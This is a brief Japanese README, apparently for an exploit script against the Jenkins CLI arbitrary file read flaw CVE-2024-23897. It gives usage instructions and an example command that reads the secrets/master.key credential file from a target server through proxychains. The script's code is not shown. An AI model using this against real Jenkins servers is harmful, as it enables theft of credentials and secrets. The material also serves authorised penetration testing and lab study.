
Jenkins CLI の任意読み取り(CVE-2024-23897 は 2.442 および LTS 2.426.3 より前のバージョンに影響)
システム上の現在のユーザーが読み取り権限を持つ任意のファイルの最初の3行を読み取ります。 このスクリプトは内部でproxychainsを使用しています。
使用方法:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
例:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key